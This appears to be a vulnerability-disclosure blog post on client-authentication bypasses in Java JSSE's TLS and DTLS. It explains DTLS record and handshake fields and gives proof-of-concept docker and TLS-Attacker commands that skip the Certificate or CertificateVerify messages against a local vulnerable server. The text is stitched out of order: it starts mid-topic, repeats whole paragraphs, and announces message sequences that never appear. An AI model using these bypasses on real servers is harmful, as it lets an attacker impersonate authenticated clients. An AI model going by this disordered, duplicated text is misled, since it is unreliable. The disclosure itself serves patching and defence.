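The explicit record header described above can be sketched with Python's standard `struct` module. The layout follows the DTLS 1.2 record header from RFC 6347. It carries the content type, version, a 16-bit epoch, an explicit 48-bit sequence number and the length, 13 bytes in total. The helper names are hypothetical, and the sketch ignores encryption entirely.

```python
import struct

CHANGE_CIPHER_SPEC, ALERT, HANDSHAKE, APPLICATION_DATA = 20, 21, 22, 23
DTLS_1_2 = (254, 253)   # DTLS 1.2 is encoded as {254, 253} on the wire
RECORD_HEADER_LEN = 13  # type(1) + version(2) + epoch(2) + sequence_number(6) + length(2)


def pack_record_header(content_type, epoch, seq, length, version=DTLS_1_2):
    """Build a DTLS record header; unlike TLS, the sequence number is sent explicitly."""
    if not 0 <= seq < 2 ** 48:
        raise ValueError("DTLS record sequence numbers are 48-bit values")
    return (
        struct.pack("!BBBH", content_type, version[0], version[1], epoch)
        + seq.to_bytes(6, "big")
        + struct.pack("!H", length)
    )


def parse_record_header(data):
    """Split the first 13 bytes of a DTLS record into its header fields."""
    if len(data) < RECORD_HEADER_LEN:
        raise ValueError("truncated DTLS record header")
    content_type, major, minor, epoch = struct.unpack("!BBBH", data[:5])
    return {
        "type": content_type,
        "version": (major, minor),
        "epoch": epoch,
        "seq": int.from_bytes(data[5:11], "big"),
        "length": struct.unpack("!H", data[11:13])[0],
    }


# A dropped record and its retransmission carry different record sequence numbers.
first_try = pack_record_header(HANDSHAKE, epoch=0, seq=2, length=42)
retransmission = pack_record_header(HANDSHAKE, epoch=0, seq=5, length=42)
print(parse_record_header(first_try)["seq"], parse_record_header(retransmission)["seq"])
```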

Besides the record sequence numbers, DTLS has additional header fields in each handshake message to ensure that all the handshake messages have been received. The first handshake message a party sends has message_seq=0, the next handshake message it transmits gets message_seq=1, and so on. This allows a party to check whether it has received all previous handshake messages. If, for example, a server received message_seq=2 and message_seq=4 but did not receive message_seq=3, it knows that it does not have all the required messages and is not allowed to proceed with the handshake. Instead, after a reasonable amount of time, it should periodically retransmit its previous flight of handshake messages to indicate to the other party that it is still waiting for further handshake messages.

This process gets even more complicated by the additional fragmentation fields DTLS includes. The MTU (Maximum Transmission Unit) plays a crucial role in UDP. When you send a UDP datagram that is bigger than the MTU, the IP layer might have to fragment it into multiple packets, and the whole datagram is lost if any of those fragments gets lost in transport. It is therefore desirable to have smaller packets in a UDP-based protocol. TLS messages can get quite big, especially the Certificate message, as it may contain a whole certificate chain. Handshake messages therefore have to support fragmentation. One would assume that the record layer would be ideal for this, as one could detect missing fragments by their record sequence number. The problem is that the protocol wants to support completely optional records, such as warning alerts or application data records, which do not need to be retransmitted if they are lost. Also, if one party decides to retransmit a message, it is always retransmitted with an increased record sequence number. For example, the first ClientKeyExchange message might have record sequence number 2. The message gets dropped, the client decides that it is time to try again, and it might send the message with record sequence number 5. This is because retransmissions are only part of DTLS during the handshake. After the handshake, it is up to the application to deal with dropped or reordered packets. It is therefore not possible to tell from the record sequence number alone whether handshake fragments have been lost. DTLS therefore adds fragment information to each handshake message record, describing where the following bytes belong within the handshake message.
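The handshake fragment fields and the message_seq gap check can be sketched in Python. The 12-byte handshake header follows RFC 6347: msg_type, a 24-bit total length, message_seq, a 24-bit fragment_offset and a 24-bit fragment_length. The helper functions and the `max_fragment` parameter are hypothetical simplifications, not how any particular library does it.

```python
import struct

CERTIFICATE = 11    # HandshakeType.certificate
HS_HEADER_LEN = 12  # msg_type(1) + length(3) + message_seq(2) + fragment_offset(3) + fragment_length(3)


def fragment_handshake(msg_type, message_seq, body, max_fragment):
    """Split one handshake message into fragments carrying at most max_fragment body bytes."""
    if max_fragment < 1:
        raise ValueError("max_fragment must be positive")
    fragments, offset = [], 0
    while True:
        chunk = body[offset:offset + max_fragment]
        header = (
            bytes([msg_type])
            + len(body).to_bytes(3, "big")    # length of the whole message
            + struct.pack("!H", message_seq)  # same message_seq in every fragment
            + offset.to_bytes(3, "big")       # where this chunk starts
            + len(chunk).to_bytes(3, "big")   # how many body bytes follow
        )
        fragments.append(header + chunk)
        offset += len(chunk)
        if offset >= len(body):  # also covers empty bodies (one zero-length fragment)
            return fragments


def parse_fragment(fragment):
    """Return (msg_type, total_length, message_seq, fragment_offset, fragment_body)."""
    total = int.from_bytes(fragment[1:4], "big")
    (message_seq,) = struct.unpack("!H", fragment[4:6])
    offset = int.from_bytes(fragment[6:9], "big")
    frag_len = int.from_bytes(fragment[9:12], "big")
    return fragment[0], total, message_seq, offset, fragment[HS_HEADER_LEN:HS_HEADER_LEN + frag_len]


def missing_message_seqs(received, next_expected):
    """Gaps below the highest message_seq received so far."""
    if not received:
        return []
    return [s for s in range(next_expected, max(received)) if s not in received]


cert_body = bytes(250)  # stand-in for a large Certificate message body
frags = fragment_handshake(CERTIFICATE, message_seq=1, body=cert_body, max_fragment=100)
print([parse_fragment(f)[3] for f in frags])          # fragment offsets
print(missing_message_seqs({2, 4}, next_expected=2))  # the example from the text
```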

If a party has to retransmit messages, it might also refragment them into pieces of different (usually smaller) sizes, as dropped packets might indicate that the packets were too big for the MTU. You might therefore already have received parts of a message and then get a retransmission that contains some of the parts you already have. Other parts are completely new to you, and you still do not have the complete message. The only option you then have is to retransmit your whole previous flight to indicate that you are still missing fragments. One notable special case in this retransmission and fragmentation madness is the ChangeCipherSpec message. In TLS, the ChangeCipherSpec message is not a handshake message but a message of the ChangeCipherSpec protocol. It therefore does not have a message_seq. Only the record it is transmitted in has a record sequence number. This is important for implementations that have to determine where to insert a ChangeCipherSpec message in the transcript.
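The reassembly problem described above can be sketched with a simple byte-coverage map: a retransmission overlaps parts you already have. This is a hypothetical, simplified Python receiver for a single handshake message. It assumes overlapping fragments carry identical bytes. It does not handle conflicting data, message_seq ordering or retransmission timers.

```python
class HandshakeReassembler:
    """Collect possibly overlapping, re-fragmented pieces of one handshake message."""

    def __init__(self, total_length):
        self.total_length = total_length
        self.buffer = bytearray(total_length)
        self.have = [False] * total_length  # which byte positions have arrived

    def add(self, offset, data):
        end = offset + len(data)
        if offset < 0 or end > self.total_length:
            raise ValueError("fragment lies outside the message")
        self.buffer[offset:end] = data  # overlapping bytes are simply overwritten
        for i in range(offset, end):
            self.have[i] = True

    def missing_ranges(self):
        """Half-open (start, end) byte ranges that are still missing."""
        ranges, start = [], None
        for i, filled in enumerate(self.have):
            if not filled and start is None:
                start = i
            elif filled and start is not None:
                ranges.append((start, i))
                start = None
        if start is not None:
            ranges.append((start, self.total_length))
        return ranges

    def complete(self):
        return all(self.have)

    def message(self):
        if not self.complete():
            raise ValueError("still missing fragments: retransmit the previous flight")
        return bytes(self.buffer)


msg = bytes(range(200))
r = HandshakeReassembler(len(msg))
r.add(0, msg[0:80])       # first fragment arrives
r.add(120, msg[120:200])  # last fragment arrives; the middle one was lost
print(r.missing_ranges())
r.add(60, msg[60:100])    # refragmented retransmission overlapping bytes we already have
print(r.missing_ranges(), r.complete())
r.add(100, msg[100:120])
print(r.complete(), r.message() == msg)
```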

As you might see, all of this (record sequence numbers, message sequence numbers, a second layer of fragmentation, retransmissions, and I didn't even mention epoch numbers) complicates DTLS a lot. Imagine being a developer who has to implement all of this correctly and securely... This might also be a reason why the scientific research community often does not treat DTLS with the same scrutiny as TLS. It gets really annoying really fast...

But what should a client do if it does not possess a certificate? According to the RFC, the client is then supposed to send an empty Certificate message and skip the CertificateVerify message (as it has no key to sign anything with). It is then up to the TLS server to decide what to do with the client. Some TLS servers provide different options for client authentication and differentiate between REQUIRED and WANTED (and NONE). If the server is set to REQUIRED, it will not finish the TLS handshake without client authentication. In the case of WANTED, the handshake is completed and the authentication status is passed to the application, which then has to decide how to proceed. This can be useful for showing the client an error that asks them to present a certificate or insert a smart card into a reader (or the like). For the bugs presented here, we set the mode to REQUIRED.
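The three client-authentication modes map fairly directly onto Python's standard `ssl` module. This is shown only as an analogy. In JSSE the same policy is set through `SSLEngine.setNeedClientAuth` and `setWantClientAuth`. The mode names come from the text. Loading the server certificate and the trusted client CAs is left out, so this sketch only configures the policy.

```python
import ssl


def server_context(client_auth: str) -> ssl.SSLContext:
    """Server-side TLS context for one of the client-authentication modes from the text."""
    modes = {
        "NONE": ssl.CERT_NONE,          # the server does not request a client certificate
        "WANTED": ssl.CERT_OPTIONAL,    # request one, but the client may decline to send it
        "REQUIRED": ssl.CERT_REQUIRED,  # the handshake fails unless a valid certificate is sent
    }
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.verify_mode = modes[client_auth]
    return ctx


for mode in ("NONE", "WANTED", "REQUIRED"):
    print(mode, server_context(mode).verify_mode)
```

The bugs below are precisely cases where the library's equivalent of the REQUIRED setting was not enforced during the handshake.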

The bugs we are presenting today were present in Java 11 and Java 13 (Oracle and OpenJDK). As far as we know, older versions were not affected. Cryptography in Java is implemented through so-called security providers. By default, the SUN JCE provider is used to implement cryptography. However, every developer is free to write or add their own security provider and to use it for their cryptographic operations. One common alternative to SUN JCE is BouncyCastle. The whole concept is very similar to OpenSSL's engine concept (if you are familiar with that). Alongside the JCE sits JSSE, the Java Secure Socket Extension, which is Java's SSL/TLS implementation. The presented attacks were evaluated using SUN JSSE, the default TLS implementation in Java. JSSE implements TLS and DTLS (added in Java 9). However, DTLS is not trivial to use, as the interface is quite complex and there are not many good examples of how to use it. In the case of DTLS, only the core of the protocol is implemented, and how the data is moved from A to B is left to the developer. We developed a test harness around SSLEngine.java to be able to speak DTLS with Java. The way JSSE implements its state machine is quite interesting, as it is completely different from all the other implementations we analyzed. JSSE uses a producer/consumer architecture to decide which messages to process. The code is quite complex but worth a look if you are interested in state machines.

The bugs we are presenting today were present in Java 11 and Java 13 (Oracle and OpenJDK). Older versions were as far as we know not affected. Cryptography in Java is implemented with so-called SecurityProvider. Per default SUN JCE is used to implement cryptography, however, every developer is free to write or add their own security provider and to use them for their cryptographic operations. One common alternative to SUN JCE is BouncyCastle. The whole concept is very similar to OpenSSL's engine concept (if you are familiar with that). Within the JCE exists JSSE - the Java Secure Socket Extension, which is the SSL/TLS part of JCE. The presented attacks were evaluated using SUN JSSE, so the default TLS implementation in Java. JSSE implements TLS and DTLS (added in Java 9). However, DTLS is not trivial to use, as the interface is quite complex and there are not a lot of good examples on how to use it. In the case of DTLS, only the heart of the protocol is implemented, how the data is moved from A to B is left to the developer. We developed a test harness around the SSLEngine.java to be able to speak DTLS with Java. The way JSSE implemented a state machine is quite interesting, as it was completely different from all other analyzed implementations. JSSE uses a producer/consumer architecture to decided on which messages to process. The code is quite complex but worth a look if you are interested in state machines.

So what is the bug we found? The first bug we discovered is that a JSSE DTLS/TLS Server accepts the following message sequence, with client authentication set to required:

JSSE is totally fine with these messages and finishes the handshake, although the client does NOT provide a certificate at all (nor a CertificateVerify message). It is even willing to exchange application data with the client. But are we really authenticated with this message flow? Who are we? We did not provide a certificate! The answer is: it depends. Some applications trust that the needClientAuth option of the TLS socket works and that the user is *some* authenticated user. Which user exactly either does not matter or is decided by other authentication methods. If an application does this, then yes, you are authenticated. We tested this bug with Apache Tomcat and were able to bypass client authentication when it was activated and configured to use JSSE. However, if the application checks the identity of the user after the TLS socket is opened, an exception is thrown:

The reason for this is the following code snippet from within JSSE:

As we did not send a client certificate, the value of peerCerts is null, so an exception is thrown. Although this bug is already pretty bad, we found an even worse (and weirder) message sequence which completely authenticates a user to a DTLS server (though not to a TLS server). Consider the following message sequence:

If we send this message sequence, the server magically finishes the handshake with us and we are authenticated.

First off: WTF

Second off: WTF!!!111

This message sequence does not make any sense from a TLS/DTLS perspective. It starts off as a "no-authentication" handshake but then weird things happen. Instead of the Finished message, we send a Certificate message, followed by a Finished message, followed by a second(!) CCS message, followed by another Finished message. Somehow this sequence confuses JSSE such that we are authenticated although we didn't even provide proof that we own the private key for the Certificate we transmitted (as we did not send a CertificateVerify message).

So what is happening here? This bug is basically a combination of multiple bugs within JSSE. By starting the flight with a ClientKeyExchange message instead of a Certificate message, we make JSSE believe that the next messages we are supposed to send are ChangeCipherSpec and Finished (basically the first exploit). Since we did not send a Certificate message, we are not required to send a CertificateVerify message. After the ClientKeyExchange message, JSSE is looking for a ChangeCipherSpec message followed by an "encrypted handshake message". JSSE assumes that the first encrypted message it receives will be the Finished message, and it waits for this condition. By sending ChangeCipherSpec and Certificate, we fulfill this condition: the Certificate message really is an "encrypted handshake message" :).

This triggers JSSE to proceed with processing the received messages. The ChangeCipherSpec message is consumed, and then the Certifi... Nope, JSSE notices that this is not a Finished message. It buffers this message and reverts to the previous state, as this step has apparently not worked correctly. It then sees the Finished message. This is OK to receive now, as we were *somehow* expecting a Finished message, but JSSE thinks that this Finished is out of place, as it has already reverted to the previous state. So this message also gets buffered. JSSE is still waiting for a ChangeCipherSpec and an "encrypted handshake message", which is what the second ChangeCipherSpec & Finished are for. These messages trigger JSSE to proceed with processing. It is actually not important that the last message is a Finished message; any handshake message will do the job.

Since JSSE thinks that it got all the required messages again, it continues to process the received messages, but the Certificate and Finished messages we sent previously are still in the buffer. The Certificate message is processed (i.e., the client certificate is written to the SSLContext.java). Then the next message in the buffer is processed, which is a Finished message. JSSE processes the Finished message (as it had already checked that it is fine to receive), checks that the verify data is correct, and then... stops processing any further messages. The Finished message basically acts as a shortcut. Once it is processed, JSSE stops interpreting the other messages in the buffer (like the remaining ChangeCipherSpec & "encrypted handshake message"). JSSE thinks that the handshake has finished and sends ChangeCipherSpec and Finished itself. With that, the handshake is completed and the connection can be used as normal. If the application using JSSE now checks the certificate in the SSLContext, it will see the certificate we presented, with no way of noticing that we never sent a CertificateVerify. The session is completely valid from JSSE's perspective.

Wow.

The bug was quite complex to analyze and is totally unintuitive. If you are still confused, don't worry. You are in good company: I spent almost a whole day analyzing the details... and I am still confused. The main reason this bug exists is that JSSE did not validate the message_seq numbers of incoming handshake messages. It basically called receive, sorted the received messages by their message_seq, and processed them in the "intended" order, without checking that this is the order they were supposed to be sent in.

For example, for JSSE the following message sequence (Certificate and CertificateVerify are exchanged) is totally fine:

Not sending a Certificate message was fine for JSSE as the REQUIRED setting was not correctly evaluated during the handshake. The consumer/producer architecture of JSSE then allowed us to cleverly bypass all the sanity checks.
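For contrast, here is a hypothetical strict check of the client's second flight under REQUIRED client authentication, written in Python. It is not JSSE's code or Oracle's fix. It only illustrates the ordering rule the text says JSSE failed to enforce, using the message names from the text. For simplicity it treats ChangeCipherSpec as part of the flight. It does not model an empty Certificate message, which a REQUIRED server must also reject.

```python
from enum import Enum


class Msg(Enum):
    CERTIFICATE = "Certificate"
    CLIENT_KEY_EXCHANGE = "ClientKeyExchange"
    CERTIFICATE_VERIFY = "CertificateVerify"
    CHANGE_CIPHER_SPEC = "ChangeCipherSpec"
    FINISHED = "Finished"


# The client flight (after ServerHelloDone) a REQUIRED server should insist on, in order.
REQUIRED_FLIGHT = [
    Msg.CERTIFICATE,
    Msg.CLIENT_KEY_EXCHANGE,
    Msg.CERTIFICATE_VERIFY,
    Msg.CHANGE_CIPHER_SPEC,
    Msg.FINISHED,
]


def check_client_flight(received):
    """Return None if the flight matches REQUIRED_FLIGHT exactly, else why it fails."""
    for position, (expected, got) in enumerate(zip(REQUIRED_FLIGHT, received)):
        if got is not expected:
            return f"message {position}: expected {expected.value}, got {got.value}"
    if len(received) < len(REQUIRED_FLIGHT):
        return f"flight ended before {REQUIRED_FLIGHT[len(received)].value}"
    if len(received) > len(REQUIRED_FLIGHT):
        return f"unexpected {received[len(REQUIRED_FLIGHT)].value} after Finished"
    return None


exploits = {
    "no_certificate": [Msg.CLIENT_KEY_EXCHANGE, Msg.CHANGE_CIPHER_SPEC, Msg.FINISHED],
    "no_certificate_verify": [Msg.CERTIFICATE, Msg.CLIENT_KEY_EXCHANGE,
                              Msg.CHANGE_CIPHER_SPEC, Msg.FINISHED],
    "dtls": [Msg.CLIENT_KEY_EXCHANGE, Msg.CHANGE_CIPHER_SPEC, Msg.CERTIFICATE,
             Msg.FINISHED, Msg.CHANGE_CIPHER_SPEC, Msg.FINISHED],
}
for name, flight in exploits.items():
    print(name, "->", check_client_flight(flight))
```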

But fortunately (for the community), this bypass does not work for TLS. Only the less-used DTLS is vulnerable. This also makes some sense. DTLS has to be much more relaxed than TLS in dealing with out-of-order messages, as UDP packets can get swapped or lost in transport and we still want to buffer messages even if they arrive out of order. Unfortunately for the community, there is also a bypass for JSSE TLS, and it is really, really trivial:

Yep. You can simply not send a CertificateVerify message (and therefore no signature at all). If there is no signature, there is nothing to be validated. From JSSE's perspective, you are completely authenticated. Nothing fancy, no complex message exchanges. Ouch.

You can build the Docker image with the following command:

docker build . -t poc

You can start the server with docker:

docker run -p 4433:4433 poc tls

The server is configured to enforce client authentication and to only accept the client certificate with the SHA-256 Fingerprint: B3EAFA469E167DDC7358CA9B54006932E4A5A654699707F68040F529637ADBC2.

You can change the fingerprint the server accepts to that of your own certificate like this:

docker run -p 4433:4433 poc tls f7581c9694dea5cd43d010e1925740c72a422ff0ce92d2433a6b4f667945a746
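To get the fingerprint of your own certificate, a minimal Python sketch could look like this. It assumes the PoC server compares a SHA-256 digest over the DER-encoded certificate, which is the usual meaning of a certificate fingerprint. The exact comparison in the PoC is not shown here, so treat that as an assumption. The function name is hypothetical, and the file name in the usage note is only an example.

```python
import hashlib
import ssl


def sha256_fingerprint(pem_cert: str) -> str:
    """Lowercase hex SHA-256 digest over the certificate's DER bytes (no colons)."""
    der = ssl.PEM_cert_to_DER_cert(pem_cert)  # strips the PEM armor and base64-decodes
    return hashlib.sha256(der).hexdigest()
```

Usage: `sha256_fingerprint(open("client.pem").read())` returns a value in the same lowercase format as the docker example above. `openssl x509 -in client.pem -noout -fingerprint -sha256` prints the same digest as colon-separated uppercase hex.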

To exploit the described vulnerabilities, you have to send (D)TLS messages in an unconventional order, or omit specific messages while still computing correct cryptographic operations. To do this, you could either modify a TLS library of your choice, or instead use our TLS library TLS-Attacker. TLS-Attacker was built to send arbitrary TLS messages with arbitrary content in an arbitrary order, which is exactly what we need for this kind of attack. We have already written about TLS-Attacker a few times. You can find a general tutorial here, but here is the TL;DR (for Ubuntu) to get you going.

TLS-Attacker should now be built, and the apps/ folder should contain the resulting .jar files.

We can now create a custom workflow as an XML file where we specify the messages we want to transmit:

This workflow trace tells TLS-Attacker to send a default ClientHello, wait for a ServerHelloDone message, then send a ClientKeyExchange message for whichever cipher suite the server chose, and follow it up with ChangeCipherSpec and Finished messages. Note that neither a Certificate nor a CertificateVerify message is sent. After that, TLS-Attacker simply waits for whatever the server sends. The last action prints any application data the server transmitted to the console. You can execute this workflow trace with TLS-Client.jar:

java -jar TLS-Client.jar -connect localhost:4433 -workflow_input exploit1.xml

With a vulnerable server the result should look something like this:

And from TLS-Attacker's perspective:

As mentioned earlier, if the server application tries to access the client certificate, JSSE throws an SSLPeerUnverifiedException. If it does not, the server happily exchanges application data.
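On the application side, the access in question is typically `SSLSession.getPeerCertificates()`, which is documented to throw `SSLPeerUnverifiedException` when the peer has not been verified. A minimal sketch of such a check follows. The `PeerCheck` class and its `PeerCertificateSource` interface are hypothetical, introduced only so the check can be exercised without a live connection; in real code you would pass `session::getPeerCertificates`.

```java
import java.security.cert.Certificate;
import javax.net.ssl.SSLPeerUnverifiedException;

/** Hypothetical application-side sanity check. */
final class PeerCheck {
    /** Anything that hands out the peer's chain, e.g. sslSession::getPeerCertificates. */
    @FunctionalInterface
    interface PeerCertificateSource {
        Certificate[] get() throws SSLPeerUnverifiedException;
    }

    /** True only if the TLS layer reports a verified peer with a non-empty certificate chain. */
    static boolean hasVerifiedPeer(PeerCertificateSource source) {
        try {
            Certificate[] chain = source.get();
            return chain != null && chain.length > 0;
        } catch (SSLPeerUnverifiedException e) {
            // No (verified) client certificate: treat the connection as unauthenticated.
            return false;
        }
    }
}
```

This only catches the first variant. As the next exploit shows, a client that sends someone else's certificate without a CertificateVerify passes this check on a vulnerable JSSE, so it is a sanity check, not a fix.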

We can now also run the second exploit against the TLS server (not the DTLS-specific one). This time, I simply also send the certificate of a valid client to the server (without knowing the corresponding private key). The modified workflow trace looks like this:

Your output should now look like this:

As you can see, accessing the certificate no longer throws an exception, and everything works as if we had the private key. Yep, it is that simple.
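What the server should have demanded here is a CertificateVerify message: a signature over the handshake transcript, made with the private key belonging to the certificate. The sketch below illustrates why a copied certificate is not enough once that signature is actually checked. It uses ECDSA on P-256 with SHA-256 and a plain byte array as a stand-in for the transcript; the real TLS 1.2 message also encodes the signature algorithm and covers the exact handshake bytes, which this hypothetical `CertificateVerifySketch` class does not model.

```java
import java.security.GeneralSecurityException;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.PrivateKey;
import java.security.PublicKey;
import java.security.Signature;
import java.security.SignatureException;

/** Hypothetical illustration of the CertificateVerify idea; not the TLS wire format. */
final class CertificateVerifySketch {
    private static final String ALG = "SHA256withECDSA";

    /** Stand-in for the key pair behind a client certificate (P-256). */
    static KeyPair newKeyPair() {
        try {
            KeyPairGenerator gen = KeyPairGenerator.getInstance("EC");
            gen.initialize(256);
            return gen.generateKeyPair();
        } catch (GeneralSecurityException e) {
            throw new IllegalStateException(e);
        }
    }

    /** Client side: sign the transcript with the certificate's private key. */
    static byte[] sign(PrivateKey key, byte[] transcript) {
        try {
            Signature s = Signature.getInstance(ALG);
            s.initSign(key);
            s.update(transcript);
            return s.sign();
        } catch (GeneralSecurityException e) {
            throw new IllegalStateException(e);
        }
    }

    /** Server side: check the signature with the public key from the presented certificate. */
    static boolean verify(PublicKey key, byte[] transcript, byte[] signature) {
        try {
            Signature s = Signature.getInstance(ALG);
            s.initVerify(key);
            s.update(transcript);
            return s.verify(signature);
        } catch (SignatureException e) {
            return false; // a malformed signature counts as invalid
        } catch (GeneralSecurityException e) {
            throw new IllegalStateException(e);
        }
    }
}
```

An attacker holding only the victim's certificate has only the public key, so any signature made with another key fails `verify`. The JSSE bug was not a weak check but a missing one: without a CertificateVerify, there was nothing to verify.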

To test the DTLS-specific vulnerability, we need a vulnerable DTLS server:

docker run -p 4434:4433/udp poc:latest dtls

A WorkflowTrace which exploits the DTLS specific vulnerability would look like this:

To execute the handshake, we additionally need to tell TLS-Attacker to use UDP instead of TCP and DTLS instead of TLS:

java -jar TLS-Client.jar -connect localhost:4434 -workflow_input exploit2.xml -transport_handler_type UDP -version DTLS12

This results in the following handshake:

As you can see, we can exchange ApplicationData as an authenticated user. The server actually sends its ChangeCipherSpec and Finished messages twice. This is done on purpose: it avoids retransmissions by the client in case one copy of the server's ChangeCipherSpec and Finished is lost in transit.

Robert Merget (@ic0nz1) (Ruhr University Bochum)

Juraj Somorovsky (@jurajsomorovsky) (Ruhr University Bochum)

Kostis Sagonas (Uppsala University)

Bengt Jonsson (Uppsala University)

Joeri de Ruiter (@cypherpunknl) (SIDN Labs)

DTLS

I guess most readers are very familiar with the traditional TLS handshake which is used in HTTPS on the web. DTLS is the crayon-eating brother of TLS. It was designed to be very similar to TLS, but with the changes necessary to run it over UDP. DTLS currently exists in two versions (DTLS 1.0 and DTLS 1.2), where DTLS 1.0 roughly corresponds to TLS 1.1 and DTLS 1.2 roughly corresponds to TLS 1.2. DTLS 1.3 is currently in the process of being standardized. But what exactly are the differences? If a protocol uses UDP instead of TCP, it can never be sure that all messages it sent were actually received by the other party, or that they arrived in the correct order. If we simply ran vanilla TLS over UDP, an out-of-order or dropped message would break the connection (not only during the handshake). DTLS therefore includes additional sequence numbers that allow the detection of out-of-order handshake messages or dropped packets. The record sequence number is transmitted within the record header and is increased by one for each record transmitted. This is different from TLS, where the record sequence number is implicit and not transmitted with each record. The record sequence numbers are especially relevant once records are encrypted, as they are included in the additional authenticated data or HMAC computation. Transmitting them explicitly allows a receiving party to verify AEAD tags and HMACs even if a packet was dropped in transit and the counters are "out of sync".
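The explicit record sequence number is easiest to see in the record header itself. Following the DTLS record format in RFC 6347 (type, version, epoch, 48-bit sequence number, length; 13 bytes in total), a minimal parsing sketch could look like this. `DtlsRecordHeader` is a hypothetical class, not part of any library, and it does no validation beyond a length check.

```java
import java.nio.ByteBuffer;

/** Fields of a DTLS 1.0/1.2 record header (RFC 6347); a sketch, not a full parser. */
final class DtlsRecordHeader {
    static final int LENGTH = 13; // 1 + 2 + 2 + 6 + 2 bytes

    final int contentType;     // 20 = change_cipher_spec, 21 = alert, 22 = handshake, 23 = application_data
    final int version;         // 0xFEFF = DTLS 1.0, 0xFEFD = DTLS 1.2
    final int epoch;           // incremented on every cipher state change
    final long sequenceNumber; // explicit 48-bit record sequence number
    final int length;          // length of the record payload in bytes

    private DtlsRecordHeader(int contentType, int version, int epoch, long sequenceNumber, int length) {
        this.contentType = contentType;
        this.version = version;
        this.epoch = epoch;
        this.sequenceNumber = sequenceNumber;
        this.length = length;
    }

    /** Reads one header; ByteBuffer defaults to big-endian, i.e. network byte order. */
    static DtlsRecordHeader parse(ByteBuffer buf) {
        if (buf.remaining() < LENGTH) {
            throw new IllegalArgumentException("truncated DTLS record header");
        }
        int type = buf.get() & 0xFF;
        int version = buf.getShort() & 0xFFFF;
        int epoch = buf.getShort() & 0xFFFF;
        long seq = 0;
        for (int i = 0; i < 6; i++) {
            seq = (seq << 8) | (buf.get() & 0xFF);
        }
        int length = buf.getShort() & 0xFFFF;
        return new DtlsRecordHeader(type, version, epoch, seq, length);
    }

    /** epoch || sequence_number as one 64-bit value, used as the sequence input to the MAC/AEAD. */
    long macSequence() {
        return ((long) epoch << 48) | sequenceNumber;
    }
}
```

`macSequence()` mirrors the DTLS rule of using epoch and sequence number, concatenated as they appear on the wire, as the 64-bit sequence value in the MAC or AEAD input; since that value travels with every record, a receiver can still verify a record after earlier ones were lost.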

Besides the record sequence numbers, DTLS has additional header fields in each handshake message to ensure that all handshake messages have been received. The first handshake message a party sends has message_seq=0, the next handshake message it transmits has message_seq=1, and so on. This allows a party to check whether it has received all previous handshake messages. If, for example, a server received message_seq=2 and message_seq=4 but not message_seq=3, it knows that it does not have all the required messages and is not allowed to proceed with the handshake. Instead, after a reasonable amount of time, it should periodically retransmit its previous flight of handshake messages to signal to the other party that it is still waiting for further handshake messages.

This process gets even more complicated by the additional fragmentation fields that DTLS includes. The MTU (Maximum Transmission Unit) plays a crucial role in UDP: when you send a UDP packet that is bigger than the MTU, the IP layer might have to fragment it into multiple packets, and the whole transmission fails if any of these fragments gets lost in transit. Smaller packets are therefore desirable in a UDP-based protocol. Since TLS handshake messages can get quite big (especially the Certificate message, as it may contain a whole certificate chain), the messages have to support fragmentation. One would assume that the record layer would be ideal for this, as one could detect missing fragments by their record sequence number. The problem is that the protocol wants to support completely optional records, which do not need to be retransmitted if they are lost, for example warning alerts or application data records. Also, if a party decides to retransmit a message, the message is always retransmitted with a new, higher record sequence number.
For example, the first ClientKeyExchange message might be sent with record sequence number 2; if it gets dropped, the client eventually decides to try again and might send it with record sequence number 5. This is because DTLS only handles retransmissions during the handshake; after the handshake, it is up to the application to deal with dropped or reordered packets. It is therefore not possible to tell from the record sequence number alone whether handshake fragments have been lost. DTLS therefore adds fragment information to every handshake message (a fragment offset and a fragment length), which specifies where the contained bytes belong within the complete handshake message.
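The handshake header that carries `message_seq` and the fragment information has a fixed 12-byte layout in DTLS 1.2 (msg_type, length, message_seq, fragment_offset, fragment_length). The hypothetical `DtlsHandshakeHeader` below parses it and adds the in-order check from the message_seq example: a message may only be processed if its `message_seq` equals the next expected value (called `next_receive_seq` in RFC 6347); later ones have to be buffered, earlier ones are duplicates.

```java
import java.nio.ByteBuffer;

/** Fields of a DTLS handshake message header (RFC 6347); a sketch, not a full parser. */
final class DtlsHandshakeHeader {
    static final int LENGTH = 12; // 1 + 3 + 2 + 3 + 3 bytes

    final int msgType;        // e.g. 11 = certificate, 15 = certificate_verify, 16 = client_key_exchange
    final int length;         // length of the complete, reassembled message body
    final int messageSeq;     // per-sender counter: 0, 1, 2, ...
    final int fragmentOffset; // where this fragment's bytes start within the message body
    final int fragmentLength; // number of body bytes carried by this fragment

    private DtlsHandshakeHeader(int msgType, int length, int messageSeq, int fragmentOffset, int fragmentLength) {
        this.msgType = msgType;
        this.length = length;
        this.messageSeq = messageSeq;
        this.fragmentOffset = fragmentOffset;
        this.fragmentLength = fragmentLength;
    }

    static DtlsHandshakeHeader parse(ByteBuffer buf) {
        if (buf.remaining() < LENGTH) {
            throw new IllegalArgumentException("truncated DTLS handshake header");
        }
        int type = buf.get() & 0xFF;
        int length = readUint24(buf);
        int messageSeq = buf.getShort() & 0xFFFF;
        int offset = readUint24(buf);
        int fragLen = readUint24(buf);
        if ((long) offset + fragLen > length) {
            throw new IllegalArgumentException("fragment exceeds message length");
        }
        return new DtlsHandshakeHeader(type, length, messageSeq, offset, fragLen);
    }

    private static int readUint24(ByteBuffer buf) {
        int b0 = buf.get() & 0xFF;
        int b1 = buf.get() & 0xFF;
        int b2 = buf.get() & 0xFF;
        return (b0 << 16) | (b1 << 8) | b2;
    }

    /** True if this single fragment already carries the whole message body. */
    boolean isUnfragmented() {
        return fragmentOffset == 0 && fragmentLength == length;
    }

    /** Only the message with message_seq == nextReceiveSeq may be processed right now. */
    boolean isNextExpected(int nextReceiveSeq) {
        return messageSeq == nextReceiveSeq;
    }
}
```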

If a party has to retransmit messages, it might also refragment them into pieces of different (usually smaller) sizes, as dropped packets might indicate that the packets were too big for the MTU. It might therefore happen that you have already received parts of a message, then get a retransmission that contains some of the parts you already have and some that are completely new to you, and you still do not have the complete message. The only option you then have is to retransmit your whole previous flight to indicate that you are still missing fragments. One notable special case in this retransmission and fragmentation madness is the ChangeCipherSpec message. In TLS, the ChangeCipherSpec message is not a handshake message, but a message of the ChangeCipherSpec protocol. It therefore does not have a message_seq; only the record it is transmitted in has a record sequence number. This is important for implementations that have to determine where a ChangeCipherSpec message belongs in the transcript.
